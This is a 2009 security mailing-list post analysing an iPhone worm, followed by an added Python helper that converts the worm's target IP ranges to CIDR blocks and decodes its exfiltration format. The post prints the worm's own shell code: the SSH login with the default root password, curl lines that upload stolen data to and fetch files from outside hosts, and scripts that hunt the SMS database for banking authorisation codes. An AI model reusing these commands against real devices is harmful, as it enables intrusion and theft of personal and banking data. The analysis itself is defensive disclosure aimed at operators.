[nsp-sec] iPhone worm: Confirmed - possibly steals SMS messages.
Scott A. McIntyre
scott at xs4all.net
Fri Nov 20 08:56:45 EST 2009
Teams,
(Sorry for the long email, but this is all very much happening real-time here as I try to get the information out to you lot)...
As per my email the other day, I'm happy (?) to report that indeed this is a new iPhone worm. It specifically targets the mobile IP ranges of many official providers for the iPhone, and has hard-coded into it the IP ranges and netmasks as follows:
192.168.0.0-192.168.3.255
94.157.100.0-94.157.255.255
87.103.52.255-87.103.66.255
94.157.0.0.0-120.157.99.255
114.72.0.0-114.75.255.255
92.248.90.0-92.248.120.255
81.217.74.0-81.217.74.255
84.224.60.0-84.224.80.255
188.88.100.0-188.88.160.255
77.248.140.0-77.248.146.255
77.54.160.0-77.54.190.255
80.57.116.0-80.57.131.255
84.224.0.0-84.224.63.255
It takes advantage of the default "alpine" password with various login attempts to these ranges:
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'
It then scps over a tarball containing sqlite, curl, the advanced commands Cydia package, and various scripts to start up the scanning/hacking.
It replaces the standard apple "ksyslog" plist with:
<string>/private/var/mobile/home/sshd</string>
It *almost* steals the SMS database:
#sqlite3 /private/var/mobile/Library/SMS/sms.db "select * from message" | cut -d \| -f 2,3,4,14 > $ID/sms.txt
On at least this phone I've been analysing, this command is commented out in the setup script.
However, it does grab other data and upload it:
curl 92.61.38.16/xml/a.php?name=$ID --data "data=`base64 -w 0 ${ID}.tgz| sed -e 's/+/%plu/g'`"
I've asked Team Cymru to blackhole that IP address, I've already done so here.
AS | IP | AS Name
47205 | 92.61.38.16 | HOSTEX HOSTEX autonomous system
It also updates the com.apple.period launchd plist to harvest information and upload it to the IP listed:
#!/bin/sh
cd /private/var/mobile/home/
# per-infection ID, written to /etc/rel at install time
ID=`cat /etc/rel`
PATH=.:$PATH
# if the fetched response has more than two lines, strip the HTTP
# request echo (GET/Host/User-Agent) and run what is left as a shell script
function check {
if test 2 -lt $(wc -l .tmp |cut -d ' ' -f 1) ; then
cat /private/var/mobile/home/.tmp | grep -v GET | grep -v Host | grep -v User-Agent > /private/var/mobile/home/heh
sh /private/var/mobile/home/heh
fi
}
# "duh" is the worm's own HTTP fetcher: pull the per-ID command from the C2
/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID > /private/var/mobile/home/.tmp
check;
The "duh" binary seems to be a pretty simple HTTP grabber, but, if you fuzz the ID you can get lots of fun stuff:
-----------------
if test "$(ls /System/Library/LaunchDaemons/ | grep com.apple.period.plist)" == "";then
cd /tmp
curl -O 207.58.247.187/com.apple.period.plist
mv com.apple.period.plist /System/Library/LaunchDaemons/
chmod +x /System/Library/LaunchDaemons/com.apple.period.plist
/bin/launchctl load -w /System/Library/LaunchDaemons/com.apple.period.plist
curl http://92.61.38.16/xml/p.php?ID=A
fi
#!/bin/sh
cd /private/var/mobile/Library/SMS
if test "$(grep -i tan-code sms.db |grep matches)" != "";then
sed -i -e 's/\/xml\/p.php?id=\$ID/\"\/xml\/p.php?id=\$ID\&j=1\"/g' /private/var/mobile/home/syslog
sh /private/var/mobile/home/syslog
fi
#!/bin/sh
/bin/launchctl unload -w /System/Library/LaunchDaemons/com.apple.ksyslog.plist
#!/bin/sh
cd /private/var/mobile/Library/SMS
if test "$(grep -i 'Codigo Autorizacao' sms.db |grep matches)" != "";then
sed -i -e 's/\/xml\/p.php?id=\$ID/\"\/xml\/p.php?id=\$ID\&p=2\"/g' /private/var/mobile/home/syslog
sh /private/var/mobile/home/syslog
fi
#!/bin/sh
/bin/launchctl unload -w /System/Library/LaunchDaemons/com.apple.ksyslog.plist
rm -rf /System/Library/LaunchDaemons/com.apple.ksyslog.plist
cat /bin/ls > /private/var/mobile/home/sshd
rm -rf /private/var/mobile/home/sshd
/bin/launchctl unload -w /System/Library/LaunchDaemons/com.apple.periodic.plist
-------------------
Also interesting here is what it does when it finds the Brazilian "Codigo Autorizacao" in the SMS database...
So, this is definitely new, folks, heads up to Mobile operators and Jailbreakers.
Best regards,
Scott A. McIntyre
XS4ALL Internet B.V.
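For operators wanting to act on the above, here are two helpers written as an added example for this page; they are not part of Scott's mail and not the worm's own code. The first turns the hard-coded start-end target list quoted above into CIDR blocks for ACLs and checks whether a given address is in scope (the five-octet entry is kept as it appears in the mail, and is reported rather than silently dropped). The second reverses the exfiltration encoding of the `curl ... --data "data=..."` line: `base64 -w 0` followed by `sed 's/+/%plu/g'`, which the C2 must undo before it can unpack the tarball. The tarball contents and the `sms.txt` line are constructed sample data, not captured from a phone.

```python
import base64
import io
import ipaddress
import re
import tarfile

# Target list copied from the worm's hard-coded ranges as quoted in the mail,
# including the malformed "94.157.0.0.0-..." entry exactly as it appears there.
TARGET_RANGES = """\
192.168.0.0-192.168.3.255
94.157.100.0-94.157.255.255
87.103.52.255-87.103.66.255
94.157.0.0.0-120.157.99.255
114.72.0.0-114.75.255.255
92.248.90.0-92.248.120.255
81.217.74.0-81.217.74.255
84.224.60.0-84.224.80.255
188.88.100.0-188.88.160.255
77.248.140.0-77.248.146.255
77.54.160.0-77.54.190.255
80.57.116.0-80.57.131.255
84.224.0.0-84.224.63.255
"""


def parse_ranges(text):
    """Parse 'start-end' lines into (start, end) IPv4Address pairs.

    Lines that do not parse (here the five-octet entry) are returned in a
    second list so an analyst sees them instead of losing them silently.
    """
    good, bad = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            start_s, end_s = line.split("-", 1)
            start, end = ipaddress.ip_address(start_s), ipaddress.ip_address(end_s)
            if start > end:
                raise ValueError("start after end")
            good.append((start, end))
        except ValueError:
            bad.append(line)
    return good, bad


def in_target_ranges(ip, ranges):
    """True if `ip` falls inside any parsed (start, end) range."""
    addr = ipaddress.ip_address(ip)
    return any(start <= addr <= end for start, end in ranges)


def ranges_to_cidrs(ranges):
    """Convert start-end pairs to CIDR strings usable in ACL / firewall rules."""
    cidrs = []
    for start, end in ranges:
        cidrs.extend(str(n) for n in ipaddress.summarize_address_range(start, end))
    return cidrs


def encode_like_worm(payload: bytes) -> str:
    """Build the POST body the way `base64 -w 0 | sed -e 's/+/%plu/g'` does.

    A form-urlencoded parser would turn a base64 '+' into a space, so the worm
    swaps it for the literal token "%plu" (not a valid percent-escape). '/' and
    '=' are sent unchanged because curl --data does not encode its argument.
    """
    b64 = base64.b64encode(payload).decode("ascii")
    return "data=" + b64.replace("+", "%plu")


def decode_exfil_body(body: str) -> bytes:
    """Recover the raw tarball bytes from a captured POST body of that form."""
    m = re.fullmatch(r"data=(.*)", body, re.S)
    if not m:
        raise ValueError("not a data= body")
    b64 = m.group(1).replace("%plu", "+")
    return base64.b64decode(b64, validate=True)


def make_sample_tarball(files):
    """Build an in-memory .tgz; a constructed stand-in for the worm's ${ID}.tgz."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def list_tarball(data: bytes):
    """Return member names of a .tgz after checking the gzip magic bytes."""
    if data[:2] != b"\x1f\x8b":
        raise ValueError("not gzip data")
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        return [m.name for m in tar.getmembers()]


if __name__ == "__main__":
    ranges, malformed = parse_ranges(TARGET_RANGES)
    print(len(ranges), "ranges parsed; unparseable:", malformed)
    print("192.168.1.5 in scope:", in_target_ranges("192.168.1.5", ranges))
    print(ranges_to_cidrs(ranges[:1]))
    # Constructed sample: one sms.txt line shaped like the cut -f 2,3,4,14 output
    tgz = make_sample_tarball({"sms.txt": b"1|+31600000000|hello|0\n"})
    print(list_tarball(decode_exfil_body(encode_like_worm(tgz))))
```

The CIDR output is what you would drop into a blackhole or ingress ACL; the decoder is what you run over a proxy capture of a POST to 92.61.38.16/xml/a.php to see what actually left the phone.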